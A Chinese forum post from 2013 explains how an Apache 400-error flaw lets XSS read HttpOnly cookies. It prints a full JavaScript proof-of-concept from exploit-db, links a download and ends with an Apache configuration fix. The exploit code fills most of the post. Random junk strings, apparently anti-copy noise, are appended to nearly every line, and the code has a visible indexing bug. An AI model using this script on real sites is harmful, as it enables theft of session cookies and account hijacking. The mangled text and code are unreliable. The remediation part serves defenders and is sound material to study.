很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。( K" P5 _' @8 ~
, D( Z( u, j; q2 y- Y+ v" G4 v
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:! Q0 V9 i8 I& ~" F1 w
' p* a3 H# u1 ], d0 ]* B
8 R' Y. C* c# W* B// http://www.exploit-db.com/exploits/18442/6 m% u/ b) N9 ~3 Y! \% ?
function setCookies (good) {/ @9 s6 l8 N% l/ i
// Construct string for cookie value
8 Z2 @& g2 |' ?0 bvar str = "";
+ P6 R. ^) i3 l& s# q, c+ n0 q3 Yfor (var i=0; i< 819; i++) {
' q1 H5 O; w' i/ \str += "x";
' o. Z7 b8 u9 \4 ~) g}
( ?5 |5 t5 h: v: Q// Set cookies
" E6 h& G: V& c2 Zfor (i = 0; i < 10; i++) {
: p1 p. Y4 u5 n" l2 i# m' n' _) d! l// Expire evil cookie4 u3 m( r! Z1 f( q4 T F6 Z
if (good) {( M! k' ?9 d8 v: j9 d3 P8 L
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";- c; h+ x2 J l' U K3 Q3 n: _) N u! Z
}
( T+ _& n8 ?1 W: B// Set evil cookie6 p0 I. @' A5 x1 q: N/ |
else {
" W1 |. ]+ A3 u2 K0 svar cookie = "xss"+i+"="+str+";path=/";% E* N7 [. T2 G2 h! l# z: s9 `
}
5 K. S9 n( t+ y0 {: _ Idocument.cookie = cookie;
* V7 L" R0 {: D- t9 B}
: q+ `0 b9 D. y6 s+ A" u}
2 n8 w; T$ J+ Y V/ Ffunction makeRequest() {
3 S, M2 F, w3 F+ k2 V3 E( ]# IsetCookies();
# Q j2 H! N C% _function parseCookies () {
" w) }- l- K' ]) f b4 v3 Svar cookie_dict = {};
9 t0 X4 m- I) n! M// Only react on 400 status7 E5 c% s; N3 _, k2 H$ L* O: K! I9 y
if (xhr.readyState === 4 && xhr.status === 400) {6 o6 g0 c9 q1 n( q3 k9 ~5 @
// Replace newlines and match <pre> content
# Y; j6 i p( w3 [, b5 d5 uvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
* C. K" w1 `9 O7 Q! V$ {' z2 n; w" ~ uif (content.length) {. s/ B! S* P: A- t: w
// Remove Cookie: prefix: t2 M$ z$ r; p5 P2 r6 P
content = content[1].replace("Cookie: ", "");1 C; R4 F- c% l
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);9 \4 j% }; H1 H" x v& E/ Q
// Add cookies to object
& w4 O! o3 u$ Y+ W* q. ?$ r1 l% kfor (var i=0; i<cookies.length; i++) {+ U+ B1 B4 [$ ~
var s_c = cookies.split('=',2);) O D$ E9 N. ?* H8 A
cookie_dict[s_c[0]] = s_c[1];9 R& @1 q& `1 ~ {; C
} B! D1 R. ~7 G! @/ Q5 r$ k
}: J& `- R6 b* ]" r* J/ @
// Unset malicious cookies
* C/ }: w" n7 p4 T; DsetCookies(true);
1 w6 J. V- ]2 u% n* Z1 talert(JSON.stringify(cookie_dict));' j) M% }# t# ^6 n6 V9 ?
}
5 p. H, x9 M: K! X+ p" u6 _}- l4 \% h" Z5 W. f4 B, N/ o0 V9 J; O/ n
// Make XHR request9 ?+ m! s8 W5 |
var xhr = new XMLHttpRequest();* a' o; i# W2 J7 S
xhr.onreadystatechange = parseCookies;
* v S: u( n. F% c4 @. Hxhr.open("GET", "/", true);& l. ~! [& P8 L
xhr.send(null);
0 {# X' Z2 c* n$ g# Y}
) b: }0 j) `9 y. R" z( fmakeRequest();$ _! @! V; Y N. j; R, c
: Q$ B6 O: n j1 K& b& _/ i你就能看见华丽丽的400错误包含着cookie信息。
- U( B2 C% M5 v1 w) T8 I- N9 h/ R* m# |4 m. C2 D" B
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#& T8 m& P" t, Z/ d( t
; {6 m1 S. t% \. Y& v3 v修复方案:4 x8 x. u5 h& u5 H% x7 D* A
) z' r# c3 [3 r4 K/ @Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
! d- x9 h. h/ ~7 r2 Q& v
; F3 L" I, U0 C, uIn the event of a problem or error, Apachecan be configured to do one of four things,
9 ~% o1 n" L( V8 T u! x% s
# J: y# {0 w7 r+ U/ _) h' ~1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
6 }8 M8 k/ n- [4 w" _4 E2. output acustomized message输出一段信息
]9 q& X2 x# o. A3 v3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 $ h9 i6 n' U$ i
4. redirect to an external URL to handle theproblem/error转向一个外部URL, n5 r; I# P) w3 Y0 i! H) g7 n
: x! e- p" z4 l4 j9 A: H
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容7 [% m* ~7 n0 s
' Q5 a9 T _* @1 x& v; K9 H
Apache配置:
$ w8 J" p! K0 y9 N* M; I
# b( d u/ w: G! S, M# ZErrorDocument400 " security test"
5 e( z; R3 L# E$ {% A
: u, a6 k/ c: i2 Q6 I- g$ }1 ]4 M当然,升级apache到最新也可:)。2 u' Q% u8 {1 J& `! I
. C" D1 Q$ A6 `( K6 C' R9 \% S# ^参考:http://httpd.apache.org/security/vulnerabilities_22.html
& @# m4 `2 @6 G1 O" {
& r) _2 v# F/ {; W |
发表于 2013-4-19 19:15:43
收藏
支持
反对